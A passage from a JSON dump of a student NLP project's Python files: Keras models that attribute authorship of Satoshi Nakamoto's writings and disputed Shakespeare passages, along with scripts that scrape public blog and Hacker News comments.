open(DISPUTED_FILE, 'r') as disputed_data_handle:\n all_lines = [l.strip() for l in disputed_data_handle.readlines()]\n\n # strip \"// Metadata\", extract json metadata object, strip \"\\n // (<fields>)\"\n metadata = json.loads(all_lines[1])\n data = [ast.literal_eval(l) for l in all_lines[4:]]\n texts = [d[0] for d in data]\n\n works = metadata[\"works\"]\n works_id_map = {w[\"id\"]: w[\"title\"] for w in works}\n\n lines_by_work = defaultdict(list)\n for d in data:\n lines_by_work[d[2]].append(d[0])\n\n tokenizer = Tokenizer()\n 
tokenizer.fit_on_texts(texts)\n\n for work, lines in lines_by_work.items():\n print(str(works_id_map[work]) + \":\", len(lines), \"examples\")\n print()\n\n random.seed(259812)\n\n\n results = []\n for w in works_id_map.keys():\n\n data_tuples = []\n seqs = tokenizer.texts_to_sequences(lines_by_work[w])\n for j, seq in enumerate(seqs):\n for chunk in utils.chunks(seq, MAX_SEQUENCE_LEN):\n if len(chunk) >= MIN_SEQUENCE_LEN:\n # 0 is NOT a label here, just a placeholder\n data_tuples.append((chunk, 0))\n\n random.shuffle(data_tuples)\n\n # vocab_size = len(tokenizer.word_docs) + 1\n disputed_X = sequence.pad_sequences([d[0] for d in data_tuples], maxlen=MAX_SEQUENCE_LEN)\n\n pred = np.around(model.predict(disputed_X, batch_size=BATCH_SIZE))\n notws = np.sum(pred)\n ws = pred.shape[0] - notws\n\n print(\"Predicting authorship of\", works_id_map[w] + \"...\")\n print(\" total passages:\", pred.shape[0])\n print(\" \", ws, \"passages attributed to William Shakespeare\")\n print(\" \", notws, \"passages attributed to other authors\")\n print(\" classification consensus:\", \"William Shakespeare\" if ws > notws else \"Other contemporary authors\")\n print()\n\n results.append((w, ws, notws))\n\n # make the bar graph\n N = len(results)\n\n ws_counts = [r[1]/(r[1]+r[2]) for r in results]\n notws_counts = [r[2]/(r[1]+r[2]) for r in results]\n\n indexes = np.arange(N)\n width = 0.35\n\n p1 = plt.bar(indexes, ws_counts, width, color=(0.3, 0.45, 1.0))\n p2 = plt.bar(indexes, notws_counts, width, bottom=ws_counts, color=(0.3, 1.0, 0.45))\n plt.ylabel('% passages in work')\n plt.xlabel('Works')\n plt.title('Classification of passages with disputed attribution')\n plt.xticks(indexes + width/2.0, [works_id_map[r[0]] for r in results], rotation=70)\n plt.yticks(np.arange(0, 1.0, 0.05))\n\n plt.savefig(RESULT_DIR+'/shake-disputed-result-bar.png', bbox_inches='tight', pad_inches=2)\n plt.close()\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6396508812904358,
"alphanum_fraction": 0.6458852887153625,
"avg_line_length": 25.733333587646484,
"blob_id": "c1ce155fac2186139ac240fc87c159368fee6256",
"content_id": "badc25a7243081cec92ca73262e4c56d76118f97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 802,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 30,
"path": "/data/satoshi/mercury-reader.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "from mercury_parser.client import MercuryParser\nfrom slugify import slugify\n\nimport os\nimport argparse\nimport time\n\nimport html2text\n\nfrom dotenv import load_dotenv, find_dotenv\n\nif __name__ == \"__main__\":\n load_dotenv(find_dotenv())\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n parser = argparse.ArgumentParser()\n parser.add_argument('urls', help='The urls to parse.', metavar='N', nargs='+')\n args = parser.parse_args()\n\n mercury = MercuryParser(api_key=os.environ['MERCURY_PARSER_KEY'])\n\n for url in args.urls:\n print(\"Parsing\", url, \"...\")\n content = h.handle(mercury.parse_article(url).json()['content'])\n with open(slugify(url) + \".txt\", \"wb\") as f:\n f.write(content.encode('utf8'))\n time.sleep(1)\n"
},
{
"alpha_fraction": 0.5186660289764404,
"alphanum_fraction": 0.5241413712501526,
"avg_line_length": 34.24561309814453,
"blob_id": "1f542dc870ffa876f2f113af7d576c3b699172e0",
"content_id": "58fec21d8d0871e069595dccd223a08e16e0478d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2009,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 57,
"path": "/data/satoshi/download-rss.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import html2text\nimport argparse\n\nfrom feedparser import parse\nfrom slugify import slugify\n\ndef download_author_comments(replies_url, author_names):\n url = replies_url\n while True:\n print (\"Parsing comments \", url, \"...\")\n feed = parse(url)\n for item in feed[\"items\"]:\n if item['author_detail']['name'] in author_names:\n with open(slugify(item[\"link\"]) + \".txt\", \"wb\") as f:\n f.write(h.handle(item[\"summary\"]).encode('utf8'))\n\n if 'feed' in feed and 'links' in feed['feed']:\n next_link = [link['href'] for link in feed['feed']['links'] if link['rel'] == 'next']\n if len(next_link) > 0:\n url = next_link[0]\n else:\n break\n else:\n break\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('url', help='The RSS url.')\n parser.add_argument('--authornames', nargs='+',\n help='Names that the author uses in the comments of their blog.')\n args = parser.parse_args()\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n url = args.url\n while True:\n print (\"Parsing\", url, \"...\")\n feed = parse(url)\n\n for item in feed[\"items\"]:\n # with open(slugify(item[\"link\"]) + \".txt\", \"wb\") as f:\n # f.write(h.handle(item[\"summary\"]).encode('utf8'))\n if args.authornames and 'links' in item:\n replies_link = [link['href'] for link in item['links'] if link['rel'] == 'replies']\n if len(replies_link) > 0:\n download_author_comments(replies_link[0], args.authornames)\n\n if 'feed' in feed and 'links' in feed['feed']:\n next_link = [link['href'] for link in feed['feed']['links'] if link['rel'] == 'next']\n if len(next_link) > 0:\n url = next_link[0]\n else:\n break\n else:\n break\n"
},
{
"alpha_fraction": 0.6169661283493042,
"alphanum_fraction": 0.6233561635017395,
"avg_line_length": 38.992591857910156,
"blob_id": "969bd7706956f394ae598b2292e6ed835913f465",
"content_id": "193a165651a0b2ba0be1a7764adcb7e7ed6adc1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10798,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 270,
"path": "/satoshi-classification.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "from keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Embedding, LSTM, Bidirectional, Dropout, GRU\nfrom keras.preprocessing.text import Tokenizer\nfrom keras import utils\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom mkdir_p import mkdir_p\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport glob\nimport random\nimport itertools\nimport argparse\n\nimport pickle\n\nfrom utils import plot_confusion_matrix, get_split, plot_length_vs_accuracy\nfrom sklearn.metrics import confusion_matrix\nfrom keras import backend as K\n\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom attention_layer import Attention\n\nfrom keras.utils import plot_model\n\nBATCH_SIZE = 32\nTRAIN_EPOCHS = 15\n\nMIN_SEQUENCE_LEN = 10\nMAX_SEQUENCE_LEN = 200\n\nWEIGHTS_FILE = \"results/satoshi-weights.hdf5\"\nCANDIDATES = [\"gavin-andresen\", \"hal-finney\", \"jed-mccaleb\", \"nick-szabo\", \"roger-ver\", \"craig-steven-wright\", \"wei-dai\"]\n\nTOKENIZER_FILE = \"results/tokenizer.pickle\"\n\ndef is_valid_candidiate(c):\n if c not in CANDIDATES:\n raise argparse.ArgumentTypeError(\"%s is an invalid candidiate\" % c)\n return c\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--train', help='Run training.', action='store_true')\n parser.add_argument('--evaluate-test', help='Run evaluations on the test split.', action='store_true')\n parser.add_argument('--evaluate-val', help='Run evaluations on the val split.', action='store_true')\n parser.add_argument('--saliency-map', help='Generate a saliency map for this text.')\n parser.add_argument('--saliency-class', help='Generate a saliency map for this class.', type=is_valid_candidiate)\n parser.add_argument('--activation-map', help='Generate an activation map for this text.')\n args = parser.parse_args()\n\n mkdir_p(\"results\")\n\n if os.path.isfile(TOKENIZER_FILE):\n print(\"======= Loading Tokenizer =======\")\n with open(TOKENIZER_FILE, 'rb') as handle:\n texts, texts_by_candidate, tokenizer, reverse_word_map = pickle.load(handle)\n else:\n print(\"======= Loading in Texts =======\")\n texts = []\n texts_by_candidate = {}\n for c in CANDIDATES + ['satoshi-nakamoto']:\n texts_by_candidate[c] = []\n for path in glob.iglob(\"./data/satoshi/%s/*.txt\" % c, recursive=True):\n with open(path, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n texts.append(text)\n texts_by_candidate[c].append((text, path))\n\n print(\"======= Generating vocabulary =======\")\n tokenizer = Tokenizer()\n tokenizer.fit_on_texts(texts)\n reverse_word_map = dict(map(reversed, tokenizer.word_index.items()))\n\n with open(TOKENIZER_FILE, 'wb') as handle:\n pickle.dump((texts, texts_by_candidate, tokenizer, reverse_word_map), handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n for auth, txts in texts_by_candidate.items():\n print (auth, \"has\", len(txts), \"texts...\")\n\n print(len(tokenizer.word_counts), \"words in vocab.\")\n\n print(\"======= Generating Data Tuples =======\")\n def chunks(iterable,size):\n it = iter(iterable)\n chunk = list(itertools.islice(it,size))\n while chunk:\n yield chunk\n chunk = list(itertools.islice(it,size))\n\n data_tuples = []\n for i, c in enumerate(CANDIDATES):\n seqs = tokenizer.texts_to_sequences(t for t, p in texts_by_candidate[c])\n for j, seq in enumerate(seqs):\n split = get_split(texts_by_candidate[c][j][1])\n for chunk in chunks(seq, MAX_SEQUENCE_LEN):\n if len(chunk) >= MIN_SEQUENCE_LEN:\n 
data_tuples.append((chunk, i, split))\n\n print (len(data_tuples), 'data tuples.')\n\n counts = [0] * len(CANDIDATES)\n for _, label, _ in data_tuples:\n counts[label] += 1\n\n for candidate, count in zip(CANDIDATES, counts):\n print(candidate, \"has\", count, \"labelled examples.\")\n\n random.shuffle(data_tuples)\n\n def prepare_input_matrix(split):\n return sequence.pad_sequences([d[0] for d in data_tuples if d[2] == split], maxlen=MAX_SEQUENCE_LEN)\n def prepare_output_matrix(split):\n return utils.to_categorical([d[1] for d in data_tuples if d[2] == split], num_classes=len(CANDIDATES))\n\n vocab_size = len(tokenizer.word_docs)\n\n x_train, y_train = prepare_input_matrix('train'), prepare_output_matrix('train')\n x_test, y_test = prepare_input_matrix('test'), prepare_output_matrix('test')\n x_val, y_val = prepare_input_matrix('val'), prepare_output_matrix('val')\n\n print('x_train shape:', x_train.shape)\n print('x_test shape:', x_test.shape)\n print('x_val shape:', x_val.shape)\n\n print('Build model...')\n model = Sequential()\n model.add(Embedding(vocab_size, 128, mask_zero=False))\n model.add(Bidirectional(GRU(128, dropout=0.5, recurrent_dropout=0.5, return_sequences=True)))\n model.add(Attention(direction=\"bidirectional\"))\n model.add(Dense(50, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(len(CANDIDATES), activation='softmax'))\n\n model.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\n plot_model(model, to_file='results/satoshi-model.png')\n model.summary()\n\n if os.path.isfile(WEIGHTS_FILE):\n model.load_weights(WEIGHTS_FILE)\n\n if args.train:\n print('======= Training Network =======')\n checkpointer = ModelCheckpoint(monitor='val_acc', filepath=WEIGHTS_FILE, verbose=1, save_best_only=True)\n earlystopping = EarlyStopping(monitor='val_acc', patience=10)\n model.fit(x_train, y_train,\n batch_size=BATCH_SIZE,\n epochs=TRAIN_EPOCHS,\n validation_data=(x_val, y_val),\n callbacks=[checkpointer, earlystopping])\n\n if args.evaluate_val:\n score, acc = model.evaluate(x_val, y_val, batch_size=BATCH_SIZE)\n print('Val score:', score)\n print('Val accuracy:', acc)\n\n with open(\"results/satoshi-val-metrics.txt\", \"w\") as f:\n f.write(\"Val score: %s\\nVal accuracy: %s\" % (score, acc))\n\n pred = np.argmax(model.predict(x_val, batch_size=BATCH_SIZE), axis=1)\n truth = np.argmax(y_val, axis=1)\n cnf_matrix = confusion_matrix(truth, pred)\n plot_confusion_matrix(cnf_matrix, classes=CANDIDATES, normalize=True,\n title='Satoshi Val Split Confusion Matrix')\n plt.savefig('results/satoshi-val-confusion-matrix.png')\n plt.close()\n\n plot_length_vs_accuracy(10, data_tuples, pred, truth,\n MAX_SEQUENCE_LEN, \"Satoshi Accuracy vs. Sequence Length (Val)\")\n plt.close()\n\n if args.evaluate_test:\n score, acc = model.evaluate(x_test, y_test, batch_size=BATCH_SIZE)\n print('Test score:', score)\n print('Test accuracy:', acc)\n\n pred = np.argmax(model.predict(x_test, batch_size=BATCH_SIZE), axis=1)\n truth = np.argmax(y_test, axis=1)\n cnf_matrix = confusion_matrix(truth, pred)\n plot_confusion_matrix(cnf_matrix, classes=CANDIDATES, normalize=True,\n title=\"Satoshi Confusion Matrix\")\n plt.savefig('results/satoshi-test-confusion-matrix.png')\n plt.close()\n\n plot_length_vs_accuracy(10, data_tuples, pred, truth,\n MAX_SEQUENCE_LEN, \"Satoshi Accuracy vs. 
Sequence Length\")\n plt.close()\n\n print(\"======= Testing Satoshi Writings =======\")\n candidate_counts = [0] * len(CANDIDATES)\n satoshi_seqs = tokenizer.texts_to_sequences(t for t, p in texts_by_candidate['satoshi-nakamoto'])\n paths = [p for t, p in texts_by_candidate['satoshi-nakamoto']]\n padded = sequence.pad_sequences(satoshi_seqs)\n scores = model.predict(padded, batch_size=BATCH_SIZE)\n print(np.sum(scores, axis=0))\n\n pred = np.argmax(scores, axis=1)\n with open(\"results/satoshi-results.txt\", \"w\") as f:\n for i, c in enumerate(pred):\n candidate_counts[c] += 1\n f.write(os.path.basename(paths[i]) + \"\\t\" + CANDIDATES[c] + \"\\t\" + str(scores[i]))\n f.write('\\n')\n\n plt.bar(np.arange(len(CANDIDATES)), candidate_counts)\n plt.ylabel('Documents')\n plt.xlabel('Candidates')\n plt.title('Classification of Satoshi Writings')\n plt.xticks(np.arange(len(CANDIDATES)), CANDIDATES)\n plt.close()\n\n if args.saliency_map:\n print(\"======= Generating Saliency Map =======\")\n with open(args.saliency_map, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n\n input = model.layers[0].output\n output = model.layers[-1].output[:,CANDIDATES.index(args.saliency_class)]\n grad = K.gradients(output, input)[0]\n saliency = K.sum(K.pow(grad, 2), axis=2)\n compute_fn = K.function([model.layers[0].input, K.learning_phase()], [saliency])\n\n seq = tokenizer.texts_to_sequences([text])[0]\n data = sequence.pad_sequences([seq])\n saliency_mat = compute_fn([data, 0])[0][0]\n saliency_mat = saliency_mat / np.max(saliency_mat)\n\n scores = model.predict(data)[0]\n pred = np.argmax(scores)\n\n env = Environment(\n loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n template = env.get_template('saliency-vis-template.html')\n\n tokens = list(reverse_word_map[id] for id in seq)\n\n with open(\"results/saliency-map.html\", \"wb\") as f:\n f.write(template.render(words=zip(tokens, saliency_mat)).encode('utf-8'))\n\n print(\"Scores:\", scores)\n print(\"Predicted Class:\", CANDIDATES[pred])\n\n if args.activation_map:\n print(\"======= Generating Activation Map =======\")\n with open(args.activation_map, \"r\", encoding=\"utf-8\") as f:\n text = f.read()\n\n activations = model.layers[1].output\n compute_fn = K.function([model.layers[0].input, K.learning_phase()], [activations])\n\n seq = tokenizer.texts_to_sequences([text])[0]\n data = sequence.pad_sequences([seq])\n activation_mat = compute_fn([data, 0])[0][0]\n\n env = Environment(loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html', 'xml']))\n env.globals.update(zip=zip, npmax=np.max, npabs=np.abs)\n template = env.get_template('activation-vis-template.html')\n tokens = list(reverse_word_map[id] for id in seq)\n\n with open(\"results/activation-map.html\", \"wb\") as f:\n f.write(template.render(tokens=tokens, activation_mat=activation_mat.T).encode('utf-8'))\n"
},
{
"alpha_fraction": 0.5868410468101501,
"alphanum_fraction": 0.5974662899971008,
"avg_line_length": 32.98611068725586,
"blob_id": "fe33b75ec60dbd926a2b44b2103390982fab685e",
"content_id": "55b52473484918b110fea62bc3f2d76809333f6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2447,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 72,
"path": "/utils.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport itertools\nimport hashlib\n\nimport matplotlib.pyplot as plt\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\ndef chunks(iterable, size):\n it = iter(iterable)\n chunk = list(itertools.islice(it, size))\n while chunk:\n yield chunk\n chunk = list(itertools.islice(it, size))\n\ndef plot_length_vs_accuracy(bins, data_tuples, pred, truth, max_seq_len, title):\n correct_bins = [0] * bins\n total_bins = [0] * bins\n bin_size = (max_seq_len // bins)\n\n for seq, pred, truth in zip([d[0] for d in data_tuples if d[2] == 'val'], pred, truth):\n bin = int(((len(seq) - 1) / max_seq_len) * bins)\n total_bins[bin] += 1\n if pred == truth:\n correct_bins[bin] += 1\n accuracy = [correct / total for correct, total in zip(correct_bins, total_bins)]\n plt.bar(np.arange(bins), accuracy)\n plt.ylabel('Accuracy')\n plt.xlabel('Sequence Size')\n\n plt.title(title)\n plt.xticks(np.arange(bins), [\"%d-%d\" % (bin_size * i, bin_size * (i + 1)) for i in range(bins)])\n\ndef get_split(string, test_split = 0.1, validation_split = 0.1):\n string_hash = hashlib.md5(string.encode('utf-8')).digest()\n prob = int.from_bytes(string_hash[:2], byteorder='big') / 2**16\n if prob < test_split:\n return 'test'\n elif prob > 1 - validation_split:\n return 'val'\n else:\n return 'train'\n"
},
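utils.py's `get_split` is what makes the train/val/test assignment reproducible: the split is a pure function of the text's MD5 hash, so no split file ever needs to be stored. A minimal self-contained check of both properties, determinism and the roughly 80/10/10 proportions (the sample strings are arbitrary):

```python
import hashlib
from collections import Counter

def get_split(string, test_split=0.1, validation_split=0.1):
    # Map the first two hash bytes onto [0, 1) and bucket by threshold.
    string_hash = hashlib.md5(string.encode('utf-8')).digest()
    prob = int.from_bytes(string_hash[:2], byteorder='big') / 2**16
    if prob < test_split:
        return 'test'
    elif prob > 1 - validation_split:
        return 'val'
    return 'train'

# The same text always lands in the same split...
assert get_split("some chunk of text") == get_split("some chunk of text")
# ...and over many texts the proportions approach 80/10/10.
print(Counter(get_split("doc-%d" % i) for i in range(10000)))
```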
{
"alpha_fraction": 0.5682539939880371,
"alphanum_fraction": 0.5795918107032776,
"avg_line_length": 37.68421173095703,
"blob_id": "d5714ea26b34e909afa77821531d34e57c38bdb5",
"content_id": "87112b9b48f23e0a212f55a8132ff91b9d5c07fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2205,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 57,
"path": "/attention_layer.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom keras import backend as K\nfrom keras.engine.topology import Layer\nfrom keras.layers import Wrapper, Recurrent\n\nclass Attention(Layer):\n def __init__(self, direction = \"forward\", variant=\"dot-product\", **kwargs):\n self.direction = direction\n self.variant = variant\n super(Attention, self).__init__(**kwargs)\n\n def build(self, input_shape):\n assert len(input_shape) == 3\n samples, time_steps, hidden_dim = input_shape[0], input_shape[1], input_shape[2]\n\n if self.variant == \"multiplicative\":\n self.w = self.add_weight(shape=(hidden_dim, hidden_dim),\n initializer='uniform', name='kernel')\n\n super(Attention, self).build(input_shape)\n\n def call(self, x):\n shape = K.shape(x)\n samples, time_steps, embedding_dim = shape[0], shape[1], shape[2]\n\n if self.direction == \"forward\":\n prev_hidden_states = x[:, :time_steps-1, :]\n final_hidden_state = x[:, time_steps-1, :]\n elif self.direction == \"backward\":\n prev_hidden_states = x[:, 1:, :]\n final_hidden_state = x[:, 0, :]\n elif self.direction == \"bidirectional\":\n forward_states = x[:, :, :(embedding_dim // 2)]\n backward_states = x[:, :, (embedding_dim // 2):]\n\n prev_hidden_states = K.concatenate([\n forward_states[:, :time_steps-1, :],\n backward_states[:, 1:, :]])\n\n final_hidden_state = K.concatenate([\n forward_states[:, time_steps-1, :],\n backward_states[:, 0, :]])\n else:\n raise ArgumentTypeError(\"Invalid direction %s\" % self.direction)\n\n if self.variant == \"multiplicative\":\n prev_hidden_states = K.dot(prev_hidden_states, self.w)\n\n scores = K.sum(prev_hidden_states * K.expand_dims(final_hidden_state, axis=1), axis=2)\n weights = K.softmax(scores)\n attention = K.sum(K.expand_dims(weights, axis=2) * prev_hidden_states, axis=1)\n\n return K.concatenate([final_hidden_state, attention], axis=-1)\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0], input_shape[2] * 2)\n"
},
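A sketch of how this `Attention` layer slots into a model, mirroring the bidirectional GRU setup in the training script above; the vocabulary size, hidden width, and class count here are placeholders, not the project's real values:

```python
from keras.models import Sequential
from keras.layers import Embedding, Bidirectional, GRU, Dense

from attention_layer import Attention

model = Sequential()
model.add(Embedding(5000, 64))
# return_sequences=True is required: Attention scores every hidden state
# against the final one.
model.add(Bidirectional(GRU(64, return_sequences=True)))
# Emits [final hidden state; attention context], twice the incoming
# feature dimension, matching compute_output_shape above.
model.add(Attention(direction="bidirectional"))
model.add(Dense(8, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam')
model.summary()
```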
{
"alpha_fraction": 0.48842474818229675,
"alphanum_fraction": 0.48867639899253845,
"avg_line_length": 23.677019119262695,
"blob_id": "e77f6e0f588c96b0dcb6b49811f2d39089a4244e",
"content_id": "9c78d7178a805158a7443d5594c87050de0e82d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3974,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 161,
"path": "/data/shakespeare/process.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import os\nfrom subprocess import call\n\ndef strip_substring(s, subs, suffix=False):\n if not suffix:\n idx = s.find(subs)\n else:\n idx = s.find(subs, len(s) - len(subs))\n return s[:idx] + s[idx + len(subs):]\n\nclass FileProcessing:\n\n DEFAULT_TEMP_FILENAME = 'temp.txt'\n\n def __init__(self, raw_filename):\n with open(raw_filename, 'r') as f:\n self.lines = [l.strip() for l in f.readlines()]\n\n self.temp_filename = self.DEFAULT_TEMP_FILENAME\n self.temp_file = open(self.temp_filename, 'w')\n self.flush()\n\n if os.path.isfile('/usr/local/bin/sublime'):\n call(['sublime', self.temp_file.name])\n\n self.prev = None\n\n def flush(self):\n self.temp_file.seek(0)\n self.temp_file.truncate()\n self.temp_file.writelines(\n [l + '\\n' for l in self.lines]\n )\n self.temp_file.flush()\n os.fsync(self.temp_file.fileno())\n\n if os.path.isfile('/usr/local/bin/sublime'):\n call(['sublime'])\n\n return self\n\n def output(self, final_filename):\n with open(final_filename, 'w+') as final:\n final.writelines(\n [l + '\\n' for l in self.lines]\n )\n return self\n\n def close(self):\n self.temp_file.close()\n os.remove(self.temp_filename)\n return self\n\n def _save(self):\n self.prev = {\n 'lines': self.lines,\n 'prev': self.prev,\n }\n return self\n\n def undo(self):\n if self.prev is not None:\n self.lines = self.prev['lines']\n self.prev = self.prev['prev']\n self.flush()\n else:\n print(\"Nothing to undo.\")\n return self\n\n def operation(self, op):\n self._save()\n self.lines = op(self.lines)\n self.flush()\n\n def remove_empty(self):\n self.operation(\n lambda lines: [l for l in lines if l != \"\"]\n )\n return self\n\n def remove_contains(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if c not in l]\n )\n return self\n\n def remove_exact(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if c != l]\n )\n return self\n\n def remove_prefix(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if not l.startswith(c)]\n )\n return self\n\n def remove_suffix(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [l for l in lines if not l.endswith(c)]\n )\n return self\n\n def remove_range(self, start, end):\n self.operation(\n lambda lines: lines[:start] + lines[end:]\n )\n return self\n\n def strip_contains(self, a):\n if type(a) != list:\n a = [a]\n\n for c in a:\n self.operation(\n lambda lines: [strip_substring(l, c) if c in l else l for l in lines]\n )\n return self\n\n def strip_prefix(self, a):\n if type(a) != list:\n a = [a]\n\n for p in a:\n self.operation(\n lambda lines: [strip_substring(l, p) if l.startswith(p) else l for l in lines]\n )\n return self\n\n def strip_suffix(self, a):\n if type(a) != list:\n a = [a]\n\n for s in a:\n self.operation(\n lambda lines: [strip_substring(l, s, True) if l.endswith(s) else l for l in lines]\n )\n return self\n\n def remove_predicate(self, pred):\n self.operation(\n lambda lines: [l for l in lines if pred(l)]\n )\n return self\n\n"
},
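`FileProcessing` is a chainable, undoable line filter for hand-cleaning the raw Shakespeare dumps; every mutator returns `self` and snapshots the previous state. A hypothetical session (file names and patterns invented for illustration):

```python
from process import FileProcessing

fp = FileProcessing('raw-play.txt')
fp.remove_empty() \
  .remove_prefix(['ACT ', 'SCENE ']) \
  .remove_contains('Dramatis Personae')
fp.undo()                    # roll back the last filter
fp.output('clean-play.txt')  # write the surviving lines
fp.close()                   # remove the temp scratch file
```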
{
"alpha_fraction": 0.5994831919670105,
"alphanum_fraction": 0.6098191142082214,
"avg_line_length": 31.25,
"blob_id": "bcd94f014e0e391847f6fcf029157926bb71665c",
"content_id": "f04d4df3e2f0dc6fe778d679fed2f6c5c45721c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 774,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 24,
"path": "/data/satoshi/download-hn-user.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport requests\nimport time\n\nimport html2text\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('user', help='The Hackernews username')\n args = parser.parse_args()\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n user = requests.get('https://hacker-news.firebaseio.com/v0/user/%s.json' % args.user).json()\n for item in user['submitted']:\n print(\"Requesting HN item\", item, \"...\")\n data = requests.get('https://hacker-news.firebaseio.com/v0/item/%s.json' % item).json()\n if data['type'] == 'comment':\n with open(\"hn-comment-%d.txt\" % item, \"wb\") as f:\n f.write(h.handle(data['text']).encode('utf8'))\n\n time.sleep(0.5)\n"
},
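The script walks a user's `submitted` ids and keeps only items whose `type` is `comment`. A minimal look at the item endpoint it depends on (item id 1 is Hacker News' first story):

```python
import requests

item = requests.get('https://hacker-news.firebaseio.com/v0/item/1.json').json()
print(item['type'])               # 'story', so the scraper above would skip it
print(item.get('text', '')[:80])  # comments carry their HTML body in 'text'
```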
{
"alpha_fraction": 0.524402916431427,
"alphanum_fraction": 0.5259605646133423,
"avg_line_length": 38.28571319580078,
"blob_id": "915d299959483bd82fbdd0d7789372274956e891",
"content_id": "686ca2e6b192b852b30a5d9955378359471a5a30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1926,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 49,
"path": "/data/shakespeare/generate_data.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport json\nfrom keras.preprocessing import text\nimport random\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"raw_metadata\")\n parser.add_argument(\"out_filename\", default=\"sp.data\")\n # if chunk size is 0, just take line by line\n parser.add_argument(\"--chunk_size\", type=int, default=0)\n args = parser.parse_args()\n\n metadata = None\n with open(args.raw_metadata, 'r') as f:\n metadata = json.load(f)\n\n output = []\n for w in metadata[\"works\"]:\n print(\"processing\", w[\"title\"] + \"....\", end=\"\", flush=True)\n with open(w[\"filename\"], 'r') as f:\n if args.chunk_size == 0: # line by line\n output += [(s.strip(), w[\"author\"], w[\"id\"]) for s in f.readlines()]\n else:\n alllines = \"\\n\".join([s.strip() for s in f.readlines()])\n words_list = text.text_to_word_sequence(alllines)\n while len(words_list) >= args.chunk_size:\n output.append((\" \".join(words_list[:args.chunk_size]), w[\"author\"], w[\"id\"]))\n words_list = words_list[args.chunk_size:]\n output.append((\" \".join(words_list), w[\"author\"], w[\"id\"]))\n '''\n alllines = [s.strip() for s in f.readlines()]\n while len(alllines) >= args.chunk_size:\n output.append((\" \".join(alllines[:args.chunk_size]), w[\"author\"], w[\"id\"]))\n alllines = alllines[args.chunk_size:]\n output.append((\" \".join(alllines), w[\"author\"], 